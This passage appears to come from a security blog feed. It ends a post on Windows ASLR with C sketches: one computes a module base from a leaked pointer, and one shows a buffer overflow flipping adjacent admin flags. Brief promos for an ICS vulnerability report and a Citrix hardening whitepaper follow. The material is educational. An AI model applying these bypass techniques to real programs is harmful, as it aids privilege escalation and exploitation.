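    uint64_t leaked_ptr = 0x00007ffc1a2b3440ULL;  /* pointer disclosed by a debug log (hypothetical) */
    uint64_t leaked_rva = 0x0000000000023440ULL;  /* that symbol's offset within the DLL (hypothetical) */
    uint64_t other_rva  = 0x0000000000051234ULL;  /* offset of some other location of interest */

    uint64_t module_base = leaked_ptr - leaked_rva;   /* ASLR slide applies to the whole image */
    uint64_t other_addr  = module_base + other_rva;   /* so every image-relative address follows */

    printf("module base : 0x%016llx\n", (unsigned long long)module_base);
    printf("other addr  : 0x%016llx\n", (unsigned long long)other_addr);
    return 0;
}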

Takeaway 6.2: Some types of memory corruption vulnerabilities simply lie outside the bounds of what ASLR can protect.

Not all memory corruption vulnerabilities need to directly achieve remote code execution. Consider a program that contains a buffer variable to receive untrusted data from the network, and a flag variable that lies immediately after it in memory. The flag variable contains bits specifying whether a user is logged in and whether the user is an administrator. If the program writes data beyond the end of the receive buffer, the “flags” variable gets overwritten and an attacker could set both the logged-in and is-admin flags. Because the attacker does not need to know or write any memory addresses, ASLR does not thwart the attack. Only if another hardening technique (such as compiler hardening flags) reordered variables, or better, moved the location of every variable in the program independently, would such attacks be blocked.
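The sketch below (a contrived, self-contained example, assuming a little-endian machine) shows the layout the paragraph describes: an out-of-bounds write into the buffer lands in the adjacent flags field without the attacker needing to know a single absolute address, so ASLR never comes into play.

/* Minimal sketch (illustrative only): a fixed buffer followed immediately by a
 * flags field. A simulated 68-byte write into the 64-byte buffer flips the
 * logged-in and is-admin bits with no knowledge of any memory address. */
#include <string.h>
#include <stdio.h>

struct session {
    char buf[64];          /* receives untrusted network data */
    unsigned int flags;    /* bit 0: logged in, bit 1: is admin */
};

int main(void)
{
    struct session s = {0};

    unsigned char evil[68];
    memset(evil, 'A', 64);
    evil[64] = 0x03; evil[65] = 0x00; evil[66] = 0x00; evil[67] = 0x00;  /* little-endian 0x00000003 */

    /* Simulated overflow: the last four bytes land in s.flags regardless of
     * where the struct happens to be located in memory. */
    memcpy(&s, evil, sizeof(evil));

    printf("logged_in=%u is_admin=%u\n", s.flags & 1, (s.flags >> 1) & 1);
    return 0;
}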

Conclusion

Address space layout randomization is a core defense against memory corruption exploits. This post covers some history of ASLR as implemented on Windows and explores the capabilities and limitations of that implementation. Defenders can use it to understand how to build programs that take best advantage of ASLR, and which Windows features apply ASLR more aggressively. Attackers can leverage ASLR's limitations, such as randomization applying only per boot and relocation of the entire image as one unit, to overcome ASLR through brute force and pointer leak attacks.

Overload: Critical Lessons from 15 Years of ICS Vulnerabilities

In the past several years, a flood of vulnerabilities has hit industrial control systems (ICS) – the technological backbone of electric grids, water supplies, and production lines. These vulnerabilities affect the reliable operation of sensors, programmable controllers, software and networking equipment used to automate and monitor the physical processes that keep our modern world running.

FireEye iSIGHT Intelligence has identified nearly 1,600 publicly disclosed ICS vulnerabilities since 2000. We examine these issues in more depth in our latest report, Overload: Critical Lessons from 15 Years of ICS Vulnerabilities, which highlights trends in total ICS vulnerability disclosures, patch availability, vulnerable device types and vulnerabilities exploited in the wild.

FireEye’s acquisition of iSIGHT provided tremendous visibility into the depth and breadth of vulnerabilities in the ICS landscape and how threat actors try to exploit them. To make matters worse, many of these vulnerabilities are left unpatched and some are simply unpatchable due to outdated technology, thus increasing the attack surface for potential adversaries. In fact, nation-state cyber threat actors have exploited five of these vulnerabilities in attacks since 2009.

Unfortunately, security personnel from manufacturing, energy, water and other industries are often unaware of their own control system assets, not to mention the vulnerabilities that affect them. As a result, organizations operating these systems are missing the warnings and leaving their industrial environments exposed to potential threats.

Click here to download the report and learn more.

Citrix XenApp and XenDesktop Hardening Guidance

A Joint Whitepaper from Mandiant and Citrix

Throughout the course of Mandiant’s Red Team and Incident Response engagements, we frequently identify a wide array of misconfigured technology solutions, including Citrix XenApp and XenDesktop.

We often see attackers leveraging stolen credentials from third parties, accessing Citrix solutions, breaking out of published applications, accessing the underlying operating systems, and moving laterally to further compromise the environment. Our experience shows that attackers are increasingly using Citrix solutions to remotely access victim environments post-compromise, instead of using traditional backdoors, remote access tools, or other types of malware. Using a legitimate means of remote access enables attackers to blend in with other users and fly under the radar of security monitoring tools.

Citrix provides extensive security hardening guidance and templates to their customers to mitigate the risk of these types of attacks. The guidance is contained in product-specific eDocs, Knowledge Base articles and detailed Common Criteria configurations. System administrators (a number of them wearing many hats and juggling multiple projects) may not have the time to review all of the hardening documentation available, so Mandiant and Citrix teamed up to provide guidance on the most significant risks posed to Citrix XenApp and XenDesktop implementations in a single white paper.

This white paper covers risks and official Citrix hardening guidance for the following topics:

  • Environment and Application Jailbreaking
  • Network Boundary Jumping
  • Authentication Weaknesses
  • Authorization Weaknesses
  • Inconsistent Defensive Measures
  • Non-configured or Misconfigured Logging and Alerting

The white paper is available here.